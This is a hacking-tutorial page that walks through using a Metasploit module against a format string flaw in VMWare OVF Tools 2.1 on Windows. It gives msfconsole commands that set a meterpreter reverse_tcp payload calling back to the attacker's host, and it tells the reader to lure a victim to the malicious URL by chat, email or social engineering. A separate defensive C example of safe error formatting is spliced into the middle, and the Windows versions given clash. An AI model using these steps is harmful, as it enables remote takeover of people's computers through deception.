Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.
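The bug class behind this, shown as an added example that is not code from OVF Tools or from the Metasploit module: an error printer is only safe when text taken from the parsed file is passed as a `%s` argument and never as the format string itself. The function names and the sample value are hypothetical, and the checker generalizes to any untrusted text, since the page does not say which OVF field is involved.

```c
#include <stdio.h>
#include <string.h>

/* Count printf-style conversion directives in untrusted text.
 * "%%" is a literal percent sign and is not counted.
 * *has_n is set to 1 if a %n (write-to-memory) directive is present. */
int count_format_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    while (*s) {
        if (*s++ != '%') continue;
        if (*s == '%') { s++; continue; }        /* escaped percent */
        s += strspn(s, "-+ #0");                 /* flags */
        s += strspn(s, "0123456789*$");          /* width or positional index */
        if (*s == '.') s += 1 + strspn(s + 1, "0123456789*$"); /* precision */
        s += strspn(s, "hlLqjzt");               /* length modifiers */
        if (*s && strchr("diouxXeEfFgGaAcspn", *s)) {
            count++;
            if (*s == 'n') *has_n = 1;
            s++;
        }
    }
    return count;
}

/* Hardened error formatting: the format string is a constant and the
 * untrusted text is passed only as a "%s" argument.
 * The vulnerable pattern would be: snprintf(out, outsz, untrusted); */
int format_error_safe(char *out, size_t outsz, const char *untrusted)
{
    return snprintf(out, outsz, "Error: %s", untrusted);
}

int main(void)
{
    /* Constructed sample value, standing in for text read from a file. */
    const char *field = "disk%08x%n.vmdk";
    char msg[128];
    int has_n;
    int n = count_format_directives(field, &has_n);
    format_error_safe(msg, sizeof msg, field);
    printf("%d directive(s), %%n present: %d\n%s\n", n, has_n, msg);
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` makes GCC and Clang warn on the non-constant format call shown in the comment.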

Exploit Targets

VMWare OVF Tools 2.1

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/ovftool_format_string

msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp

msf exploit (ovftool_format_string)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (ovftool_format_string)>set srvhost 192.168.1.6 (This must be an address on the local machine)

msf exploit (ovftool_format_string)>set uripath / (The URL to use for this exploit)

msf exploit (ovftool_format_string)>exploit

Now give the URL http://192.168.1.6:8080/ to your victim via chat, email or any social engineering technique.

You now have access to the victim's PC. Use “sessions -l” to list the sessions and their numbers, then type “sessions -i ID” to connect to a session.
